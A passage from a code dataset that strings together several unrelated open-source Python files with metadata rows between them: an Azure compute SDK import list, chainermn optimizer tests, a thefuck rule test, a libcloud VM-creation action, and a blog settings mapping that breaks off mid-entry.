from ._models import GalleryImageVersionStorageProfile # type: ignore
from ._models import GalleryList # type: ignore
from ._models import GalleryOSDiskImage # type: ignore
from ._models import GrantAccessData # type: ignore
from ._models import HardwareProfile # type: ignore
from ._models import Image # type: ignore
from ._models import ImageDataDisk # type: ignore
from ._models import ImageDiskReference # type: ignore
from ._models import ImageListResult # type: ignore
from ._models import ImageOSDisk # type: ignore
from ._models import ImagePurchasePlan # type: ignore
from ._models import ImageReference # type: ignore
from ._models import ImageStorageProfile # type: ignore
from ._models import ImageUpdate # type: ignore
from ._models import InnerError # type: ignore
from ._models import InstanceViewStatus # type: ignore
from ._models import KeyVaultAndKeyReference # type: ignore
from ._models import KeyVaultAndSecretReference # type: ignore
from ._models import KeyVaultKeyReference # type: ignore
from ._models import KeyVaultSecretReference # type: ignore
from ._models import LinuxConfiguration # type: ignore
from ._models import ListUsagesResult # type: ignore
from ._models import LogAnalyticsInputBase # type: ignore
from ._models import LogAnalyticsOperationResult # type: ignore
from ._models import LogAnalyticsOutput # type: ignore
from ._models import MaintenanceRedeployStatus # type: ignore
from ._models import ManagedArtifact # type: ignore
from ._models import ManagedDiskParameters # type: ignore
from ._models import NetworkInterfaceReference # type: ignore
from ._models import NetworkProfile # type: ignore
from ._models import OSDisk # type: ignore
from ._models import OSDiskImage # type: ignore
from ._models import OSProfile # type: ignore
from ._models import Plan # type: ignore
from ._models import ProximityPlacementGroup # type: ignore
from ._models import ProximityPlacementGroupListResult # type: ignore
from ._models import ProximityPlacementGroupUpdate # type: ignore
from ._models import PurchasePlan # type: ignore
from ._models import RecommendedMachineConfiguration # type: ignore
from ._models import RecoveryWalkResponse # type: ignore
from ._models import RegionalReplicationStatus # type: ignore
from ._models import ReplicationStatus # type: ignore
from ._models import RequestRateByIntervalInput # type: ignore
from ._models import Resource # type: ignore
from ._models import ResourceRange # type: ignore
from ._models import RollbackStatusInfo # type: ignore
from ._models import RollingUpgradePolicy # type: ignore
from ._models import RollingUpgradeProgressInfo # type: ignore
from ._models import RollingUpgradeRunningStatus # type: ignore
from ._models import RollingUpgradeStatusInfo # type: ignore
from ._models import RunCommandDocument # type: ignore
from ._models import RunCommandDocumentBase # type: ignore
from ._models import RunCommandInput # type: ignore
from ._models import RunCommandInputParameter # type: ignore
from ._models import RunCommandListResult # type: ignore
from ._models import RunCommandParameterDefinition # type: ignore
from ._models import RunCommandResult # type: ignore
from ._models import ScaleInPolicy # type: ignore
from ._models import ScheduledEventsProfile # type: ignore
from ._models import Sku # type: ignore
from ._models import Snapshot # type: ignore
from ._models import SnapshotList # type: ignore
from ._models import SnapshotSku # type: ignore
from ._models import SnapshotUpdate # type: ignore
from ._models import SourceVault # type: ignore
from ._models import SshConfiguration # type: ignore
from ._models import SshPublicKey # type: ignore
from ._models import StorageProfile # type: ignore
from ._models import SubResource # type: ignore
from ._models import SubResourceReadOnly # type: ignore
from ._models import TargetRegion # type: ignore
from ._models import TerminateNotificationProfile # type: ignore
from ._models import ThrottledRequestsInput # type: ignore
from ._models import UpdateResource # type: ignore
from ._models import UpgradeOperationHistoricalStatusInfo # type: ignore
from ._models import UpgradeOperationHistoricalStatusInfoProperties # type: ignore
from ._models import UpgradeOperationHistoryStatus # type: ignore
from ._models import UpgradePolicy # type: ignore
from ._models import Usage # type: ignore
from ._models import UsageName # type: ignore
from ._models import UserArtifactManage # type: ignore
from ._models import UserArtifactSource # type: ignore
from ._models import UserAssignedIdentitiesValue # type: ignore
from ._models import VMScaleSetConvertToSinglePlacementGroupInput # type: ignore
from ._models import VaultCertificate # type: ignore
from ._models import VaultSecretGroup # type: ignore
from ._models import VirtualHardDisk # type: ignore
from ._models import VirtualMachine # type: ignore
from ._models import VirtualMachineAgentInstanceView # type: ignore
from ._models import VirtualMachineCaptureParameters # type: ignore
from ._models import VirtualMachineCaptureResult # type: ignore
from ._models import VirtualMachineExtension # type: ignore
from ._models import VirtualMachineExtensionHandlerInstanceView # type: ignore
from ._models import VirtualMachineExtensionImage # type: ignore
from ._models import VirtualMachineExtensionInstanceView # type: ignore
from ._models import VirtualMachineExtensionUpdate # type: ignore
from ._models import VirtualMachineExtensionsListResult # type: ignore
from ._models import VirtualMachineHealthStatus # type: ignore
from ._models import VirtualMachineIdentity # type: ignore
from ._models import VirtualMachineImage # type: ignore
from ._models import VirtualMachineImageResource # type: ignore
from ._models import VirtualMachineInstanceView # type: ignore
from ._models import VirtualMachineListResult # type: ignore
from ._models import VirtualMachineReimageParameters # type: ignore
from ._models import VirtualMachineScaleSet # type: ignore
from ._models import VirtualMachineScaleSetDataDisk # type: ignore
from ._models import VirtualMachineScaleSetExtension # type: ignore
from ._models import VirtualMachineScaleSetExtensionListResult # type: ignore
from ._models import VirtualMachineScaleSetExtensionProfile # type: ignore
from ._models import VirtualMachineScaleSetIPConfiguration # type: ignore
from ._models import VirtualMachineScaleSetIdentity # type: ignore
from ._models import VirtualMachineScaleSetIdentityUserAssignedIdentitiesValue # type: ignore
from ._models import VirtualMachineScaleSetInstanceView # type: ignore
from ._models import VirtualMachineScaleSetInstanceViewStatusesSummary # type: ignore
from ._models import VirtualMachineScaleSetIpTag # type: ignore
from ._models import VirtualMachineScaleSetListOSUpgradeHistory # type: ignore
from ._models import VirtualMachineScaleSetListResult # type: ignore
from ._models import VirtualMachineScaleSetListSkusResult # type: ignore
from ._models import VirtualMachineScaleSetListWithLinkResult # type: ignore
from ._models import VirtualMachineScaleSetManagedDiskParameters # type: ignore
from ._models import VirtualMachineScaleSetNetworkConfiguration # type: ignore
from ._models import VirtualMachineScaleSetNetworkConfigurationDnsSettings # type: ignore
from ._models import VirtualMachineScaleSetNetworkProfile # type: ignore
from ._models import VirtualMachineScaleSetOSDisk # type: ignore
from ._models import VirtualMachineScaleSetOSProfile # type: ignore
from ._models import VirtualMachineScaleSetPublicIPAddressConfiguration # type: ignore
from ._models import VirtualMachineScaleSetPublicIPAddressConfigurationDnsSettings # type: ignore
from ._models import VirtualMachineScaleSetReimageParameters # type: ignore
from ._models import VirtualMachineScaleSetSku # type: ignore
from ._models import VirtualMachineScaleSetSkuCapacity # type: ignore
from ._models import VirtualMachineScaleSetStorageProfile # type: ignore
from ._models import VirtualMachineScaleSetUpdate # type: ignore
from ._models import VirtualMachineScaleSetUpdateIPConfiguration # type: ignore
from ._models import VirtualMachineScaleSetUpdateNetworkConfiguration # type: ignore
from ._models import VirtualMachineScaleSetUpdateNetworkProfile # type: ignore
from ._models import VirtualMachineScaleSetUpdateOSDisk # type: ignore
from ._models import VirtualMachineScaleSetUpdateOSProfile # type: ignore
from ._models import VirtualMachineScaleSetUpdatePublicIPAddressConfiguration # type: ignore
from ._models import VirtualMachineScaleSetUpdateStorageProfile # type: ignore
from ._models import VirtualMachineScaleSetUpdateVMProfile # type: ignore
from ._models import VirtualMachineScaleSetVM # type: ignore
from ._models import VirtualMachineScaleSetVMExtensionsSummary # type: ignore
from ._models import VirtualMachineScaleSetVMInstanceIDs # type: ignore
from ._models import VirtualMachineScaleSetVMInstanceRequiredIDs # type: ignore
from ._models import VirtualMachineScaleSetVMInstanceView # type: ignore
from ._models import VirtualMachineScaleSetVMListResult # type: ignore
from ._models import VirtualMachineScaleSetVMNetworkProfileConfiguration # type: ignore
from ._models import VirtualMachineScaleSetVMProfile # type: ignore
from ._models import VirtualMachineScaleSetVMProtectionPolicy # type: ignore
from ._models import VirtualMachineScaleSetVMReimageParameters # type: ignore
from ._models import VirtualMachineSize # type: ignore
from ._models import VirtualMachineSizeListResult # type: ignore
from ._models import VirtualMachineStatusCodeCount # type: ignore
from ._models import VirtualMachineUpdate # type: ignore
from ._models import WinRMConfiguration # type: ignore
from ._models import WinRMListener # type: ignore
from ._models import WindowsConfiguration # type: ignore
from ._compute_management_client_enums import (
AccessLevel,
AggregatedReplicationState,
AvailabilitySetSkuTypes,
CachingTypes,
DedicatedHostLicenseTypes,
DiffDiskOptions,
DiskCreateOption,
DiskCreateOptionTypes,
DiskState,
DiskStorageAccountTypes,
GalleryApplicationVersionPropertiesProvisioningState,
GalleryImagePropertiesProvisioningState,
GalleryImageVersionPropertiesProvisioningState,
GalleryPropertiesProvisioningState,
HostCaching,
HyperVGeneration,
HyperVGenerationType,
HyperVGenerationTypes,
IPVersion,
IntervalInMins,
MaintenanceOperationResultCodeTypes,
OperatingSystemStateTypes,
OperatingSystemTypes,
ProtocolTypes,
ProximityPlacementGroupType,
ReplicationState,
ReplicationStatusTypes,
ResourceIdentityType,
RollingUpgradeActionType,
RollingUpgradeStatusCode,
SettingNames,
SnapshotStorageAccountTypes,
StatusLevelTypes,
StorageAccountType,
StorageAccountTypes,
UpgradeMode,
UpgradeOperationInvoker,
UpgradeState,
VirtualMachineEvictionPolicyTypes,
VirtualMachinePriorityTypes,
VirtualMachineScaleSetScaleInRules,
VirtualMachineScaleSetSkuScaleType,
VirtualMachineSizeTypes,
)
__all__ = [
'AccessUri',
'AdditionalCapabilities',
'AdditionalUnattendContent',
'ApiEntityReference',
'ApiError',
'ApiErrorBase',
'AutomaticOSUpgradePolicy',
'AutomaticOSUpgradeProperties',
'AutomaticRepairsPolicy',
'AvailabilitySet',
'AvailabilitySetListResult',
'AvailabilitySetUpdate',
'BillingProfile',
'BootDiagnostics',
'BootDiagnosticsInstanceView',
'ComputeOperationListResult',
'ComputeOperationValue',
'CreationData',
'DataDisk',
'DataDiskImage',
'DedicatedHost',
'DedicatedHostAllocatableVM',
'DedicatedHostAvailableCapacity',
'DedicatedHostGroup',
'DedicatedHostGroupListResult',
'DedicatedHostGroupUpdate',
'DedicatedHostInstanceView',
'DedicatedHostListResult',
'DedicatedHostUpdate',
'DiagnosticsProfile',
'DiffDiskSettings',
'Disallowed',
'Disk',
'DiskEncryptionSettings',
'DiskInstanceView',
'DiskList',
'DiskSku',
'DiskUpdate',
'EncryptionSettingsCollection',
'EncryptionSettingsElement',
'Gallery',
'GalleryApplication',
'GalleryApplicationList',
'GalleryApplicationVersion',
'GalleryApplicationVersionList',
'GalleryApplicationVersionPublishingProfile',
'GalleryArtifactPublishingProfileBase',
'GalleryArtifactSource',
'GalleryDataDiskImage',
'GalleryDiskImage',
'GalleryIdentifier',
'GalleryImage',
'GalleryImageIdentifier',
'GalleryImageList',
'GalleryImageVersion',
'GalleryImageVersionList',
'GalleryImageVersionPublishingProfile',
'GalleryImageVersionStorageProfile',
'GalleryList',
'GalleryOSDiskImage',
'GrantAccessData',
'HardwareProfile',
'Image',
'ImageDataDisk',
'ImageDiskReference',
'ImageListResult',
'ImageOSDisk',
'ImagePurchasePlan',
'ImageReference',
'ImageStorageProfile',
'ImageUpdate',
'InnerError',
'InstanceViewStatus',
'KeyVaultAndKeyReference',
'KeyVaultAndSecretReference',
'KeyVaultKeyReference',
'KeyVaultSecretReference',
'LinuxConfiguration',
'ListUsagesResult',
'LogAnalyticsInputBase',
'LogAnalyticsOperationResult',
'LogAnalyticsOutput',
'MaintenanceRedeployStatus',
'ManagedArtifact',
'ManagedDiskParameters',
'NetworkInterfaceReference',
'NetworkProfile',
'OSDisk',
'OSDiskImage',
'OSProfile',
'Plan',
'ProximityPlacementGroup',
'ProximityPlacementGroupListResult',
'ProximityPlacementGroupUpdate',
'PurchasePlan',
'RecommendedMachineConfiguration',
'RecoveryWalkResponse',
'RegionalReplicationStatus',
'ReplicationStatus',
'RequestRateByIntervalInput',
'Resource',
'ResourceRange',
'RollbackStatusInfo',
'RollingUpgradePolicy',
'RollingUpgradeProgressInfo',
'RollingUpgradeRunningStatus',
'RollingUpgradeStatusInfo',
'RunCommandDocument',
'RunCommandDocumentBase',
'RunCommandInput',
'RunCommandInputParameter',
'RunCommandListResult',
'RunCommandParameterDefinition',
'RunCommandResult',
'ScaleInPolicy',
'ScheduledEventsProfile',
'Sku',
'Snapshot',
'SnapshotList',
'SnapshotSku',
'SnapshotUpdate',
'SourceVault',
'SshConfiguration',
'SshPublicKey',
'StorageProfile',
'SubResource',
'SubResourceReadOnly',
'TargetRegion',
'TerminateNotificationProfile',
'ThrottledRequestsInput',
'UpdateResource',
'UpgradeOperationHistoricalStatusInfo',
'UpgradeOperationHistoricalStatusInfoProperties',
'UpgradeOperationHistoryStatus',
'UpgradePolicy',
'Usage',
'UsageName',
'UserArtifactManage',
'UserArtifactSource',
'UserAssignedIdentitiesValue',
'VMScaleSetConvertToSinglePlacementGroupInput',
'VaultCertificate',
'VaultSecretGroup',
'VirtualHardDisk',
'VirtualMachine',
'VirtualMachineAgentInstanceView',
'VirtualMachineCaptureParameters',
'VirtualMachineCaptureResult',
'VirtualMachineExtension',
'VirtualMachineExtensionHandlerInstanceView',
'VirtualMachineExtensionImage',
'VirtualMachineExtensionInstanceView',
'VirtualMachineExtensionUpdate',
'VirtualMachineExtensionsListResult',
'VirtualMachineHealthStatus',
'VirtualMachineIdentity',
'VirtualMachineImage',
'VirtualMachineImageResource',
'VirtualMachineInstanceView',
'VirtualMachineListResult',
'VirtualMachineReimageParameters',
'VirtualMachineScaleSet',
'VirtualMachineScaleSetDataDisk',
'VirtualMachineScaleSetExtension',
'VirtualMachineScaleSetExtensionListResult',
'VirtualMachineScaleSetExtensionProfile',
'VirtualMachineScaleSetIPConfiguration',
'VirtualMachineScaleSetIdentity',
'VirtualMachineScaleSetIdentityUserAssignedIdentitiesValue',
'VirtualMachineScaleSetInstanceView',
'VirtualMachineScaleSetInstanceViewStatusesSummary',
'VirtualMachineScaleSetIpTag',
'VirtualMachineScaleSetListOSUpgradeHistory',
'VirtualMachineScaleSetListResult',
'VirtualMachineScaleSetListSkusResult',
'VirtualMachineScaleSetListWithLinkResult',
'VirtualMachineScaleSetManagedDiskParameters',
'VirtualMachineScaleSetNetworkConfiguration',
'VirtualMachineScaleSetNetworkConfigurationDnsSettings',
'VirtualMachineScaleSetNetworkProfile',
'VirtualMachineScaleSetOSDisk',
'VirtualMachineScaleSetOSProfile',
'VirtualMachineScaleSetPublicIPAddressConfiguration',
'VirtualMachineScaleSetPublicIPAddressConfigurationDnsSettings',
'VirtualMachineScaleSetReimageParameters',
'VirtualMachineScaleSetSku',
'VirtualMachineScaleSetSkuCapacity',
'VirtualMachineScaleSetStorageProfile',
'VirtualMachineScaleSetUpdate',
'VirtualMachineScaleSetUpdateIPConfiguration',
'VirtualMachineScaleSetUpdateNetworkConfiguration',
'VirtualMachineScaleSetUpdateNetworkProfile',
'VirtualMachineScaleSetUpdateOSDisk',
'VirtualMachineScaleSetUpdateOSProfile',
'VirtualMachineScaleSetUpdatePublicIPAddressConfiguration',
'VirtualMachineScaleSetUpdateStorageProfile',
'VirtualMachineScaleSetUpdateVMProfile',
'VirtualMachineScaleSetVM',
'VirtualMachineScaleSetVMExtensionsSummary',
'VirtualMachineScaleSetVMInstanceIDs',
'VirtualMachineScaleSetVMInstanceRequiredIDs',
'VirtualMachineScaleSetVMInstanceView',
'VirtualMachineScaleSetVMListResult',
'VirtualMachineScaleSetVMNetworkProfileConfiguration',
'VirtualMachineScaleSetVMProfile',
'VirtualMachineScaleSetVMProtectionPolicy',
'VirtualMachineScaleSetVMReimageParameters',
'VirtualMachineSize',
'VirtualMachineSizeListResult',
'VirtualMachineStatusCodeCount',
'VirtualMachineUpdate',
'WinRMConfiguration',
'WinRMListener',
'WindowsConfiguration',
'AccessLevel',
'AggregatedReplicationState',
'AvailabilitySetSkuTypes',
'CachingTypes',
'DedicatedHostLicenseTypes',
'DiffDiskOptions',
'DiskCreateOption',
'DiskCreateOptionTypes',
'DiskState',
'DiskStorageAccountTypes',
'GalleryApplicationVersionPropertiesProvisioningState',
'GalleryImagePropertiesProvisioningState',
'GalleryImageVersionPropertiesProvisioningState',
'GalleryPropertiesProvisioningState',
'HostCaching',
'HyperVGeneration',
'HyperVGenerationType',
'HyperVGenerationTypes',
'IPVersion',
'IntervalInMins',
'MaintenanceOperationResultCodeTypes',
'OperatingSystemStateTypes',
'OperatingSystemTypes',
'ProtocolTypes',
'ProximityPlacementGroupType',
'ReplicationState',
'ReplicationStatusTypes',
'ResourceIdentityType',
'RollingUpgradeActionType',
'RollingUpgradeStatusCode',
'SettingNames',
'SnapshotStorageAccountTypes',
'StatusLevelTypes',
'StorageAccountType',
'StorageAccountTypes',
'UpgradeMode',
'UpgradeOperationInvoker',
'UpgradeState',
'VirtualMachineEvictionPolicyTypes',
'VirtualMachinePriorityTypes',
'VirtualMachineScaleSetScaleInRules',
'VirtualMachineScaleSetSkuScaleType',
'VirtualMachineSizeTypes',
]
| mit | -8,375,254,461,826,944,000 | 46.698925 | 102 | 0.764766 | false |
niboshi/chainer | tests/chainermn_tests/optimizer_tests/test_multi_node_optimizer.py | 2 | 9956 | import chainer
from chainer.backends.cuda import cupy
import chainer.testing
import chainer.testing.attr
import chainermn
import mock
import numpy as np
import unittest
class ExampleModel(chainer.Chain):
def __init__(self):
super(ExampleModel, self).__init__()
with self.init_scope():
self.a = chainer.links.Linear(2, 3)
self.b = chainer.links.Linear(3, 4)
self.c = chainer.links.Linear(4, 5)
class TestMultiNodeOptimizer(unittest.TestCase):
def setup_cpu(self):
self.comm = chainermn.create_communicator('naive')
self.target = ExampleModel()
self.target.a.W.data[:] = self.comm.rank
self.target.b.W.data[:] = self.comm.rank + 1
self.target.c.W.data[:] = self.comm.rank + 2
self.target.a.W.grad[:] = 0
self.target.b.W.grad[:] = 0
self.target.c.W.grad[:] = 0
self.actual_optimizer = chainer.GradientMethod()
self.actual_optimizer.create_update_rule = mock.MagicMock
def setup_gpu(self, device=None):
self.comm = chainermn.create_communicator('flat')
device = self.comm.intra_rank
chainer.cuda.get_device_from_id(device).use()
self.target = ExampleModel()
self.target.to_device(cupy.cuda.Device())
self.target.a.W.data[:] = self.comm.rank
self.target.b.W.data[:] = self.comm.rank + 1
self.target.c.W.data[:] = self.comm.rank + 2
self.target.a.W.grad[:] = 0
self.target.b.W.grad[:] = 0
self.target.c.W.grad[:] = 0
self.actual_optimizer = chainer.GradientMethod()
self.actual_optimizer.create_update_rule = mock.MagicMock
def test_update_with_cpu(self):
self.setup_cpu()
self.optimizer = chainermn.create_multi_node_optimizer(
self.actual_optimizer, self.comm)
opt = self.optimizer.setup(self.target)
assert opt is self.optimizer
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 0)
self.optimizer.target.a.W.grad[:] = self.comm.rank
self.optimizer.target.b.W.grad[:] = self.comm.rank + 1
self.optimizer.target.c.W.grad[:] = self.comm.rank + 2
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 1)
self.optimizer.target.a.W.update_rule.update.assert_called_once_with(
self.optimizer.target.a.W)
self.optimizer.target.b.W.update_rule.update.assert_called_once_with(
self.optimizer.target.b.W)
self.optimizer.target.c.W.update_rule.update.assert_called_once_with(
self.optimizer.target.c.W)
base = (self.comm.size - 1.0) / 2
chainer.testing.assert_allclose(self.optimizer.target.a.W.grad,
(base + 0) * np.ones((3, 2)))
chainer.testing.assert_allclose(self.optimizer.target.b.W.grad,
(base + 1) * np.ones((4, 3)))
chainer.testing.assert_allclose(self.optimizer.target.c.W.grad,
(base + 2) * np.ones((5, 4)))
@chainer.testing.attr.gpu
def test_update_with_gpu(self):
self.setup_gpu()
self.optimizer = chainermn.create_multi_node_optimizer(
self.actual_optimizer, self.comm)
opt = self.optimizer.setup(self.target)
assert opt is self.optimizer
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 0)
self.optimizer.target.a.W.grad[:] = self.comm.rank
self.optimizer.target.b.W.grad[:] = self.comm.rank + 1
self.optimizer.target.c.W.grad[:] = self.comm.rank + 2
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 1)
self.optimizer.target.a.W.update_rule.update.assert_called_once_with(
self.optimizer.target.a.W)
self.optimizer.target.b.W.update_rule.update.assert_called_once_with(
self.optimizer.target.b.W)
self.optimizer.target.c.W.update_rule.update.assert_called_once_with(
self.optimizer.target.c.W)
base = (self.comm.size - 1.0) / 2
chainer.testing.assert_allclose(self.optimizer.target.a.W.grad,
(base + 0) * np.ones((3, 2)))
chainer.testing.assert_allclose(self.optimizer.target.b.W.grad,
(base + 1) * np.ones((4, 3)))
chainer.testing.assert_allclose(self.optimizer.target.c.W.grad,
(base + 2) * np.ones((5, 4)))
class DynamicExampleModel(chainer.Chain):
def __init__(self):
super(DynamicExampleModel, self).__init__()
with self.init_scope():
self.a = chainer.links.Linear(2, 3)
self.b = chainer.links.Linear(3, 4)
class TestMultiNodeOptimizerWithDynamicModel(unittest.TestCase):
def setup_cpu(self):
self.comm = chainermn.create_communicator('naive')
self.target = DynamicExampleModel()
self.target.a.W.data[:] = self.comm.rank
self.target.b.W.data[:] = self.comm.rank + 1
self.target.a.W.grad[:] = 0
self.target.b.W.grad[:] = 0
self.actual_optimizer = chainer.GradientMethod()
self.actual_optimizer.create_update_rule = mock.MagicMock
def setup_gpu(self, device=None):
self.comm = chainermn.create_communicator('flat')
device = self.comm.intra_rank
chainer.cuda.get_device_from_id(device).use()
self.target = DynamicExampleModel()
self.target.to_device(cupy.cuda.Device())
self.target.a.W.data[:] = self.comm.rank
self.target.b.W.data[:] = self.comm.rank + 1
self.target.a.W.grad[:] = 0
self.target.b.W.grad[:] = 0
self.actual_optimizer = chainer.GradientMethod()
self.actual_optimizer.create_update_rule = mock.MagicMock
def test_update_with_cpu(self):
self.setup_cpu()
self.optimizer = chainermn.create_multi_node_optimizer(
self.actual_optimizer, self.comm)
opt = self.optimizer.setup(self.target)
assert opt is self.optimizer
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 0)
with self.target.init_scope():
self.target.c = chainer.links.Linear(4, 4)
if self.comm.rank == 0:
self.target.c.W.data[:] = self.comm.rank + 2
self.optimizer.setup(self.target)
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 0)
send_buf = chainer.cuda.to_cpu(self.optimizer.target.c.W.data)
recv_buf = self.comm.mpi_comm.allgather(send_buf)
for i in range(1, self.comm.size):
chainer.testing.assert_allclose(recv_buf[0], recv_buf[i])
self.optimizer.target.a.W.grad[:] = self.comm.rank
self.optimizer.target.b.W.grad[:] = self.comm.rank + 1
self.optimizer.target.c.W.grad[:] = self.comm.rank + 2
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 1)
self.optimizer.target.a.W.update_rule.update.assert_called_once_with(
self.optimizer.target.a.W)
self.optimizer.target.b.W.update_rule.update.assert_called_once_with(
self.optimizer.target.b.W)
self.optimizer.target.c.W.update_rule.update.assert_called_once_with(
self.optimizer.target.c.W)
base = (self.comm.size - 1.0) / 2
chainer.testing.assert_allclose(self.optimizer.target.a.W.grad,
(base + 0) * np.ones((3, 2)))
chainer.testing.assert_allclose(self.optimizer.target.b.W.grad,
(base + 1) * np.ones((4, 3)))
chainer.testing.assert_allclose(self.optimizer.target.c.W.grad,
(base + 2) * np.ones((4, 4)))
@chainer.testing.attr.gpu
def test_update_with_gpu(self):
self.setup_gpu()
self.optimizer = chainermn.create_multi_node_optimizer(
self.actual_optimizer, self.comm)
opt = self.optimizer.setup(self.target)
assert opt is self.optimizer
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 0)
with self.target.init_scope():
c = chainer.links.Linear(4, 4)
c.to_device(cupy.cuda.Device())
self.target.c = c
if self.comm.rank == 0:
self.target.c.W.data[:] = self.comm.rank + 2
self.optimizer.setup(self.target)
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 0)
send_buf = chainer.cuda.to_cpu(self.optimizer.target.c.W.data)
recv_buf = self.comm.mpi_comm.allgather(send_buf)
for i in range(1, self.comm.size):
chainer.testing.assert_allclose(recv_buf[0], recv_buf[i])
self.optimizer.target.a.W.grad[:] = self.comm.rank
self.optimizer.target.b.W.grad[:] = self.comm.rank + 1
self.optimizer.target.c.W.grad[:] = self.comm.rank + 2
self.optimizer.update()
self.assertEqual(self.actual_optimizer.t, 1)
self.optimizer.target.a.W.update_rule.update.assert_called_once_with(
self.optimizer.target.a.W)
self.optimizer.target.b.W.update_rule.update.assert_called_once_with(
self.optimizer.target.b.W)
self.optimizer.target.c.W.update_rule.update.assert_called_once_with(
self.optimizer.target.c.W)
base = (self.comm.size - 1.0) / 2
chainer.testing.assert_allclose(self.optimizer.target.a.W.grad,
(base + 0) * np.ones((3, 2)))
chainer.testing.assert_allclose(self.optimizer.target.b.W.grad,
(base + 1) * np.ones((4, 3)))
chainer.testing.assert_allclose(self.optimizer.target.c.W.grad,
(base + 2) * np.ones((4, 4)))
| mit | -7,424,995,401,902,875,000 | 42.666667 | 77 | 0.599237 | false |
petr-tichy/thefuck | tests/rules/test_django_south_merge.py | 20 | 2113 | import pytest
from thefuck.rules.django_south_merge import match, get_new_command
from tests.utils import Command
@pytest.fixture
def stderr():
return '''Running migrations for app:
! Migration app:0003_auto... should not have been applied before app:0002_auto__add_field_query_due_date_ but was.
Traceback (most recent call last):
File "/home/nvbn/work/.../bin/python", line 42, in <module>
exec(compile(__file__f.read(), __file__, "exec"))
File "/home/nvbn/work/.../app/manage.py", line 34, in <module>
execute_from_command_line(sys.argv)
File "/home/nvbn/work/.../lib/django/core/management/__init__.py", line 443, in execute_from_command_line
utility.execute()
File "/home/nvbn/work/.../lib/django/core/management/__init__.py", line 382, in execute
self.fetch_command(subcommand).run_from_argv(self.argv)
File "/home/nvbn/work/.../lib/django/core/management/base.py", line 196, in run_from_argv
self.execute(*args, **options.__dict__)
File "/home/nvbn/work/.../lib/django/core/management/base.py", line 232, in execute
output = self.handle(*args, **options)
File "/home/nvbn/work/.../app/lib/south/management/commands/migrate.py", line 108, in handle
ignore_ghosts = ignore_ghosts,
File "/home/nvbn/work/.../app/lib/south/migration/__init__.py", line 207, in migrate_app
raise exceptions.InconsistentMigrationHistory(problems)
south.exceptions.InconsistentMigrationHistory: Inconsistent migration history
The following options are available:
--merge: will just attempt the migration ignoring any potential dependency conflicts.
'''
def test_match(stderr):
assert match(Command('./manage.py migrate', stderr=stderr), None)
assert match(Command('python manage.py migrate', stderr=stderr), None)
assert not match(Command('./manage.py migrate'), None)
assert not match(Command('app migrate', stderr=stderr), None)
assert not match(Command('./manage.py test', stderr=stderr), None)
def test_get_new_command():
assert get_new_command(Command('./manage.py migrate auth'), None) \
== './manage.py migrate auth --merge'
| mit | 542,531,086,048,707,000 | 48.139535 | 115 | 0.710364 | false |
pinterb/st2contrib | packs/libcloud/actions/create_vm.py | 8 | 1847 | from libcloud.compute.base import NodeSize
from libcloud.compute.base import NodeImage
from libcloud.compute.base import NodeLocation
from lib.actions import BaseAction
__all__ = [
'CreateVMAction'
]
class CreateVMAction(BaseAction):
api_type = 'compute'
def run(self, credentials, name, size_id=None, image_id=None, size_name=None, image_name=None,
location_id=None):
driver = self._get_driver_for_credentials(credentials=credentials)
location = NodeLocation(id=location_id, name=None,
country=None, driver=driver)
if (not size_id and not size_name) or (size_id and size_name):
raise ValueError('Either "size_id" or "size_name" needs to be provided')
if (not image_id and not image_name) or (image_id and image_name):
raise ValueError('Either "image_id" or "image_name" needs to be provided')
if size_id is not None:
size = NodeSize(id=size_id, name=None,
ram=None, disk=None, bandwidth=None,
price=None, driver=driver)
elif size_name is not None:
size = [s for s in driver.list_sizes() if size_name in s.name][0]
if image_id is not None:
image = NodeImage(id=image_id, name=None,
driver=driver)
elif image_name is not None:
image = [i for i in driver.list_images() if
image_name in i['extra'].get('displaytext', image.name)][0]
kwargs = {'name': name, 'size': size, 'image': image}
if location_id:
kwargs['location'] = location
self.logger.info('Creating node...')
node = driver.create_node(**kwargs)
self.logger.info('Node successfully created: %s' % (node))
return node
| apache-2.0 | -752,134,328,594,870,000 | 35.215686 | 98 | 0.592312 | false |
ismail-s/fireblog | fireblog/settings/mapping.py | 1 | 3714 | from collections import namedtuple
from . import validators
Entry = namedtuple('Entry', [
'registry_name', # Registry name
'display_name', # Display name
'description', # Description
'type', # eg int, str... A func that returns an obj of the right type.
# Validator is a function that takes a value and returns a bool
# indicating if it is a valid entry
'default_value', # A default value that satisfies validator. This means
# that code that depends on a setting always has some value to use, even
# if the user hasn't changed the setting yet.
'validator',
'min', # If type is a number, then this can be set to the min allowed num
'max', # Max allowed num (if type is a number)
'value' # If we know the value of this, then we set this to it.
])
entry_defaults = (None,) * 3 + (lambda x: x, '', lambda x: True) + (None,) * 3
Entry.__new__.__defaults__ = entry_defaults
mapping = (
Entry(
'fireblog.max_rss_items',
'Max number of RSS items',
'The maximum number of items to show in the RSS feed. '
'The latest posts are shown in the RSS feed.',
int,
default_value=50,
min=1,
max=99999),
Entry(
'fireblog.all_view_post_len',
'Max length of post preview',
'Some webpages show previews of several posts. '
'Here, you can set how long those previews can be.',
int,
default_value=150,
min=1,
max=99999),
Entry(
'persona.siteName',
'Site name',
'Name of the website. If this is changed, then the website should be '
'restarted at some point in order to update the display of the '
'sitename in the login screen.',
str,
default_value='My blog',
validator=validators.sitename_validator),
Entry(
'persona.secret',
'Persona secret',
'This is a secret required by Mozilla Persona, the authentication '
'mechanism used on this blog. This should basically be some random '
'string.',
str,
default_value='change this to a random string'),
Entry(
'persona.audiences',
'Persona audiences',
'This should be a list of domains this blog is served on. This is '
'required by the Persona authentication mechanism. If a domain is '
'not on this list, then logins won\'t work from that domain.',
str,
# This default_value is a list of urls from which you should be able
# to login to the website before you have changed this setting.
# Changing this could mean that the end user has to modify the settings
# db directly just to login for the first time...
default_value='http://localhost:8080 https://localhost:8080'),
Entry(
'fireblog.recaptcha_secret',
'Recaptcha secret',
'The Recaptcha secret used for server-side validation to combat spam. '
'See https://www.google.com/recaptcha for more details.',
str,
default_value='Replace this with your recaptcha secret.',
validator=validators.recaptcha_validator),
Entry(
'fireblog.recaptcha_site_key',
'Recaptcha site key',
'The Recaptcha site key that is included in the html Recaptcha widget.'
